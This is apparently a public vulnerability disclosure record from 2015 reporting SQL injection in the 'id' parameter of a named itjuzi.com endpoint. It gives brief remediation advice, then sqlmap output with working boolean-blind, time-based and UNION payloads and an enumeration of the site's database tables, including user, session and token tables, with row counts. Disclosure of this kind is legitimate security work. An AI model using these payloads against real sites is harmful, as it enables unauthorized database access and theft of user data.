2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开
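漏洞地址:http://sh.itjuzi.com/everjob?id=1&type=invsp
说明:GET 参数 id 存在 SQL 注入。从下方 sqlmap 结果推测,id 的值未经类型校验就被直接拼接进 SQL 语句括号内的条件中(推测,需结合源码确认);修复时应对 id 做整数校验并改用参数化查询(预处理语句),同时限制该数据库账号的权限。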
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1) AND 2340=2340 AND (2895=2895&type=invsp

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))ZjqW) AND (1982=1982&type=invsp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1) UNION ALL SELECT NULL,NULL,CONCAT(0x71627a6b71,0x50744e6c4c645a4b476a,0x7170626a71),NULL,NULL,NULL-- &type=invsp
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL >= 5.0.0
Database: itjuzi
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| mobile_sessions | 959290 |
| tbl_search | 359979 |
| tbl_front_users_groups | 198273 |
| tbl_front_user | 197714 |
| ci_sessions | 160444 |
| spider_news | 149028 |
| db_company_all | 141976 |
| tbl_rel_com_with_new_tag | 136607 |
| tbl_front_user_follow_scope | 100484 |
| tbl_view_count | 89585 |
| tbl_rel_api_with_db | 67713 |
| tbl_front_user_follow_com | 63942 |
| spider_coms | 60653 |
| db_company_managers | 59982 |
| db_manager | 59982 |
| tbl_rel_com_with_tag | 54334 |
| click_like | 47998 |
| tbl_rel_auth_user | 47691 |
| tbl_oauth | 47617 |
| tbl_rel_per_with_skills | 39788 |
| tbl_rel_com_with_mil | 37103 |
| tbl_com_mile_stone | 36921 |
| tbl_rel_front_user_goal | 36767 |
| tbl_contacts_person_connect | 33194 |
| tbl_contacts_rel_person_with_tag | 33084 |
| tbl_rel_front_user_skill | 31807 |
| tbl_rel_com_with_new | 30595 |
| tbl_new | 30586 |
| tbl_company | 29873 |
| tbl_contribution | 28012 |
| mixed_timeline | 26835 |
| tbl_rel_com_with_new_cat | 26492 |
| tbl_rel_com_with_new_sub_cat | 26467 |
| tbl_com_image | 25840 |
| tbl_rel_com_with_image | 25101 |
| tbl_rel_per_with_com | 23195 |
| tbl_contacts_person | 22054 |
| tbl_person | 20053 |
| tbl_contacts_history | 18935 |
| tbl_contacts_rel_person_with_history | 18929 |
| user_token | 18786 |
| tbl_rel_invse_with_invsp_or_invst | 17883 |
| tbl_rel_invst_with_scope | 17792 |
| tbl_front_user_follow_circle | 15594 |
| tbl_commont_star | 15457 |
| tbl_product | 13179 |
| tbl_rel_com_with_product | 13179 |
| tbl_investevent | 12990 |
| tbl_front_user_follow_investment | 11833 |
| tbl_clues | 10467 |
| tbl_search_count_data | 10304 |
| user_phone_cms | 9662 |
| tbl_rel_invst_with_state | 7456 |
| tbl_rel_per_with_education | 7439 |
| tbl_hunt_invst_action | 7267 |
| spider_news_2015 | 7048 |
| tbl_rel_per_with_ever_job | 6565 |
| tbl_claim | 6384 |
| search_total | 5461 |
| tbl_maimai_tag | 5440 |
| new_comment | 5364 |
| today_product | 5002 |
| addr_list | 4223 |
| tbl_maimai_relation | 3948 |
| tbl_testpage | 3890 |
| tbl_app_ddashi_company | 3820 |
| tbl_commont | 3679 |
| tbl_front_user_follow_investor | 3574 |
| tbl_user_center_count | 3502 |
| tbl_front_user_follow_album | 3134 |
| tbl_album_company | 3080 |
| tbl_coolchuan_relation_with_com | 2683 |
| tbl_rel_hunt_invst_with_scope | 2427 |
| user_msg | 2348 |
| tbl_rel_com_with_scale | 2324 |
| talk_hot_num | 2185 |
| tbl_investment | 2153 |
| tal_rel_archive_cat_with_company | 2040 |
| tbl_rel_invst_with_invsp | 1701 |
| tbl_activity_mem | 1659 |
| tbl_investor | 1602 |
| talk | 1571 |
| today_smtp_subscriber | 1275 |
| tbl_merger | 1162 |
| tbl_com_credit_basic | 1039 |
| spider_invest | 972 |
| tbl_front_user_follow_experience | 961 |
| tbl_rel_hunt_invst_with_round | 865 |
| tbl_new_tag | 789 |
| tbl_rel_new_cat_with_new_tag | 772 |
| tbl_project_tag | 666 |
| tbl_per_ever_job | 617 |
| tbl_invite_code | 572 |
| tbl_per_education | 521 |
| spider_news_delay | 518 |
| tbl_rel_hunt_invst_with_currency | 454 |
| user_connect | 420 |
| rand_name | 401 |
| tbl_invst_address | 372 |
| today_user_follow_album | 349 |
| tbl_com_tag | 342 |
| tbl_rel_com_tag_with_category | 325 |
| tbl_hunt_invst_info | 306 |
| today_album_company | 292 |
| tbl_front_user_follow_archive | 274 |
| tbl_album | 250 |
| ci_sessions_3 | 231 |
| comment_replay | 225 |
| tbl_new_cat | 200 |
| spider_news_used | 199 |
| tal_rel_archive_with_cat | 166 |
| tbl_company_chief | 151 |
| tbl_hunt_follow_project | 140 |
| tbl_project_team | 140 |
| shanghai_article | 127 |
| circle_topic | 124 |
| tbl_project_detail | 117 |
| my_follow | 113 |
| tbl_rel_project_with_tag | 100 |
| tbl_contacts_person_tag | 92 |
| tbl_activity | 86 |
| tbl_new_pingwest | 85 |
| microdata | 78 |
| feed_back | 70 |
| tbl_rel_com_with_similar | 54 |
| tbl_project | 49 |
| tbl_project_contact | 49 |
| correct_company_by_user | 47 |
| user_verrify | 39 |
| tbl_hunt_user_submit | 38 |
| users_groups | 38 |
| tbl_investor_role | 37 |
| users | 37 |
| tbl_report | 36 |
| tbl_invst_news | 34 |
| today_album | 32 |
| user_add_custom | 30 |
| smtp_week_today | 29 |
| birth_first_year_msg | 25 |
| tbl_com_change | 25 |
| feedback_msg | 24 |
| tbl_invst_image | 23 |
| tbl_activity_summary | 22 |
| tbl_com_tag_category | 22 |
| tbl_com_scope | 21 |
| tbl_rel_activity_with_show | 21 |
| tbl_rel_invst_with_image | 21 |
| tbl_investment_scope | 20 |
| tbl_per_skills | 18 |
| tbl_front_user_skill | 17 |
| tal_archive | 15 |
| tbl_activity_jushuo | 14 |
| tbl_com_fund_status | 14 |
| tbl_new_type | 14 |
| tbl_investevent_round | 12 |
| tbl_commont_replay | 11 |
| circle | 10 |
| shanghai_activity_list | 10 |
| topic_type | 10 |
| tbl_front_user_goal | 9 |
| tbl_investment_state | 9 |
| tbl_merger_identity | 9 |
| tbl_product_type | 9 |
| tbl_com_listed | 8 |
| tbl_investevent_currency | 8 |
| tbl_invst_new_type | 8 |
| tbl_activity_report | 7 |
| tbl_investevent_assess_money | 7 |
| my_inform | 5 |
| tbl_contribution_role | 5 |
| tbl_investevent_similar_money | 5 |
| tbl_com_credit_partners | 4 |
| tbl_com_fund_needs | 4 |
| tbl_com_stage | 4 |
| tbl_com_status | 4 |
| tbl_front_groups | 4 |
| tbl_report_type | 4 |
| groups | 3 |
| tbl_com_credit_employees | 3 |
| tbl_front_user_role | 3 |
| tbl_hunt_service | 3 |
| tbl_hunt_service_type | 3 |
| tbl_wechat_img | 3 |
| site_base | 1 |
| tbl_invst_capital | 1 |
| tbl_invst_mile_stone | 1 |
| user_update_new_version | 1 |
+--------------------------------------+---------+
危害等级:无影响(厂商忽略)
忽略时间:2015-12-01 15:50
漏洞Rank:4 (WooYun评价)
暂无